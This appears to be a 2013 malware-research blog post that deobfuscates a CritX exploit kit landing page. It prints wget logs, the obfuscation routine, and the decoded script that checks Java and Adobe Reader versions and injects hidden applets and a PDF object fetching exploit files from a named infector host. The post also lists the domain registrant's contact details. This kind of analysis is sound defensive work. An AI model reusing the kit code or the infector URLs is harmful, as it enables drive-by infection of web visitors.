Since we are focusing to the deobfuscation malware codes manually, I'm sorry that the payload information will not be included in this post (considering that the know-how on exploit kit's obfuscation is the target, thus the moronz can change the payload to anything they want anyway).
BTW, capture of the infected(?), I'd say an INFECTOR, site: (clean this up!)
The infector site's domain name is having Chinese registrant data:
Domain Name: kaovo.com Registrant Contact: juxiangpin xiangpin ju bestpa1@hotmail.com telephone: +86.02088889929 fax: +86.02088889927 kandung jinyang jinyang kandung 800267 CNOK. Enough for the teaser, we'll make it quick, so here we go:
Starts with the below spam url:#MalwareMustDie!h00p://www.themabbutt.com/index.php?cPath=24We fetched the index.php:Resolving www.themabbutt.com... seconds 0.00, 74.200.90.212 Caching www.themabbutt.com => 74.200.90.212 Connecting to www.themabbutt.com|74.200.90.212|:80... seconds 0.00, connected. : GET /index.php?cPath=24 HTTP/1.0 User-Agent: MMD Crusader Host: www.themabbutt.com Connection: Keep-Alive HTTP request sent, awaiting response... HTTP/1.1 200 OK Date: Sun, 13 Jan 2013 08:15:02 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_p assthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5 X-Powered-By: PHP/5.2.5 Set-Cookie: osCsid=3f7fdcd550948f798d34ba0630c7f8c1; path=/; domain=themabbutt.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html 200 OK Length: unspecified [text/html] 17:15:14 (44.68 KB/s) - `index.php' savedIt has the double obduscation code in the end of the file:↑Both the the obfuscation code has the same structure below:
// the obfuscation data: if(1) { f=new Array(9,8,103,99,32,39,98,108,99,116,107,98,110,115,44,100,101,1 105,101,108,99,107,116,114,64,118,84,96,101,75,97,108,99,37,39,97,109, 97,139,88,48,92,39,120,13,8,7,6,105,101,112,94,109,100,112,37,41,58,11, 6,9,124,108,114,99,29,123,12,7,6,9,99,109,96,117,108,99,107,116,45,117, : // and the deobfuscation generator code: for(i=0;-i+628!=0;i+=1) { j=i; if((031==0x19))if(e)s=s+String["fro"+"mCharCode"]((1*w「j」+j%4)); }Use the ↑above logic & both obfs code will be burped deobfs code below:The second url will forward you to google, but - the first link's url if we download the source & see the inside, it contains the suspicious link as per below:
I fetched it like this:
--17:21:10-- h00p://root.kaovo.com/n121212p/awsxd/i.php?token=speed/ => `i.php@token=speed%2F' Resolving root.kaovo.com... seconds 0.00, 62.76.184.93 Caching root.kaovo.com => 62.76.184.93 Connecting to root.kaovo.com|62.76.184.93|:80... seconds 0.00, connected. : GET /n121212p/awsxd/i.php?token=speed/ HTTP/1.0 Referer: h00p://www.themabbutt.com/index.php?cPath=24 User-Agent: MMD Crusader Agent Host: root.kaovo.com Connection: Keep-Alive : HTTP request sent, awaiting response... :After some "fun" effort receiving 302, finally we received the 1.php$ ls -alF i.php -rwx------ xxxx xxxx 2644 Jan 12 21:58 i.php* MD5: 39583fcb535d2925a5000f4b8deae64aPS, here's the server's headers:Server: nginx/1.1.14 Date: Sun, 13 Jan 2013 08:21:00 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive X-Powered-By: PHP/5.3.3-7+squeeze14A fail/blocked attempt will pass you to download yandex.ru's cookies:HTTP/1.1 302 Found Server: nginx/1.1.14 Date: Sun, 13 Jan 2013 08:21:00 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive X-Powered-By: PHP/5.3.3-7+squeeze14 Location: h00p://www.yandex.ru/robots.txt Vary: Accept-EncodingThe Landing Page Script
The i.php file contains 2 lines of the obfuscation script. It is the landing page of CritX Exploit KitLet's make it more "viewable" structure :-)
With the below explanation:
1. The pd.js is the PluginDetect 0.7.9 used to guard the pages of this EK. unlike the other EK, it is in seperated download and shared to other infector files. 2. The obfuscation code is found in the script, after passed checks on pd.js, it was a packed script as per shown in line 9. 3. There is a direct download infector in line 14 w/meta refrash tag method. 4. The moronz put the variable used for deobfuscation in other part (line 18).Let's see the PluginDetect used:--17:30:05-- h00p://root.kaovo.com/n121212p/awsxd/js/pd.js => `pd.js' Resolving root.kaovo.com... seconds 0.00, 62.76.184.93 Caching root.kaovo.com => 62.76.184.93 Connecting to root.kaovo.com|62.76.184.93|:80... seconds 0.00, connected. : GET /n121212p/awsxd/js/pd.js HTTP/1.0 Referer: http://www.themabbutt.com/index.php?cPath=24 User-Agent: MMD Crusader Host: root.kaovo.com Connection: Keep-Alive Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 : HTTP request sent, awaiting response... : HTTP/1.1 200 OK Server: nginx/1.1.14 Date: Sun, 13 Jan 2013 08:29:56 GMT Content-Type: application/javascript Content-Length: 28592 Connection: keep-alive Last-Modified: Thu, 22 Nov 2012 06:59:46 GMT ETag: "2e0a69-6fb0-4cf1003249c80" Accept-Ranges: bytes Vary: Accept-Encoding : 200 OK Length: 28,592 (28K) [application/javascript] 17:30:08 (15.12 KB/s) - `pd.js' saved [28592/28592]This is the inside, a one line script, hello PluginDetect 0.7.9
Decoding Obfuscation Infector Script
So how to decode the infector part? Let's see the good structure first:It is a simple structure, by feeding the generator by obfuscation data with eliminating garbages/unnecessary code we can get the deobfuscation script saved in the "e" variable here -->>[PASTEBIN] Seeing the codes, we'll see the infector is aiming to check your java version: (by fetching result from PluginDetect 0.7.9)
var GfkghfHqFF9 = (PluginDetect.getVersion("Java") + ".").toString().split("."); if ((GfkghfHqFF9[0] == 1) && (GfkghfHqFF9[1] == 7) && (GfkghfHqFF9[3] < 9)){ Y9Nmp1nN7 = 7 } else if ((GfkghfHqFF9[0] == 1) && (GfkghfHqFF9[1] == 6) && (GfkghfHqFF9[3] < 33)){ Y9Nmp1nN7 = 6 } else if ((GfkghfHqFF9[0] == 1) && (GfkghfHqFF9[1] < 6)){ Y9Nmp1nN7 = 5 } else { Y9Nmp1nN7 = 0And your pdf version (fetching result from PluginDetect 0.7.9)var bqeVOXhTg9n = (PluginDetect.getVersion("AdobeReader") + ".")["toString"]().split("." ); if ((bqeVOXhTg9n[0] == 8) || ((bqeVOXhTg9n[0] == 9) && (bqeVOXhTg9n[1] < 4))){ selJdFtA = 2 } else { selJdFtA = 0 }The return value of 7, 6, 5, 2, 0 was used to trigger jars & PDF exploit file downloads described in the below functions:// case of return code zero --->// redirected into YANDEX.... if ((selJdFtA == 0) && (Y9Nmp1nN7 == 0) && (b3RSQGB84 == 0)){ document.location.href = "h00p://root.kaovo.com/n121212p/awsxd/jpfoff.php?token=%64%65%66%61%75%6c%74&" } if (Y9Nmp1nN7 == 5){ // case of "5" java exploit download document.write(' <div style="visibility:hidden"> <applet code="a.Test" archive="j15.php?i=cXOYGn5Mc5008McXOY0SFtid0Sd5dSAjAr1fAjrSiFk06riAlWcXOYDF1DF5DFFDFSDl5DFjDl1cXO5" width="1" height="1"> <param name="oh" value="dXXOszzHUUX9PFUhU9WULz=#Y#Y#YOzF:BnfzoUFf9OdORiM-SF-r#-1r-r#-tApXUPi=M-rS-rA-rr-r#-1A-rW-1Sp"> </applet></div>') } if (Y9Nmp1nN7 == 6){ // case of "6" java exploit download document.write(' <div style="visibility:hidden"> <applet code="a.Test" archive="j16.php?i=cXOYGn5Mc5008McXOY0SFtid0Sd5dSAjAr1fAjrSiFk06riAlWcXOYDF1DF5DFFDFSDl5DFjDl1cXOYF" width="1" height="1"> <param name="oh" value="dXXOszzHUUX9PFUhU9WULz=#Y#Y#YOzF:BnfzoUFf9OdORiM-SF-r#-1r-r#-trpXUPi=M-rS-rA-rr-r#-1A-rW-1Sp"> </applet></div>') } if (Y9Nmp1nN7 == 7){ // case of "7" java exploit download document.write(' <div style="visibility:hidden"> <applet code="E" archive="j17.php?i=cXOYGn5Mc5008McXOY0SFtid0Sd5dSAjAr1fAjrSiFk06riAlWcXOYDF1DF5DFFDFSDl5DFjDl1cXOYl" width="1" height="1"> <param name="oh" value="dXXOszzHUUX9PFUhU9WULz=#Y#Y#YOzF:BnfzoUFf9OdORiM-SF-r#-1r-r#-t1pXUPi=M-rS-rA-rr-r#-1A-rW-1Sp"> </applet></div>') } if (selJdFtA == 2){ //case of "2" pdf exploit download document.write(' <div style="visibility:hidden"> <object type="application/pdf" data="lpdf.php?i=cXOYGn5Mc5008McXOY0SFtid0Sd5dSAjAr1fAjrSiFk06riAlWcXOYDF1DF5DFFDFSDl5DFjDl1cXOYxLk&" width="10" height="10"> </object></div>')}↑The point is, three jars and a PDF exploit downloads are - the weapon of the current case of CritXPack Exploit Kit. The sample of these script infector are here --->>[MEDIAFIRE] Current infection landing page reference-1 at URLQuery -->>[URLQuery] Current infection's redirector reference-2 at URLQuery -->>[URLQuery] More CritXPack reference at Malware don't need Coffee -->>[HERE] [UPDATED] *) RECENT CritXPack Infection URL (regex) in URLQuery 1 -->>[HERE] thx @MalwareSigs *) RECENT CritXPack Infection URL (regex) in URLQuery 1 -->>[HERE] thx @Set_Abominae
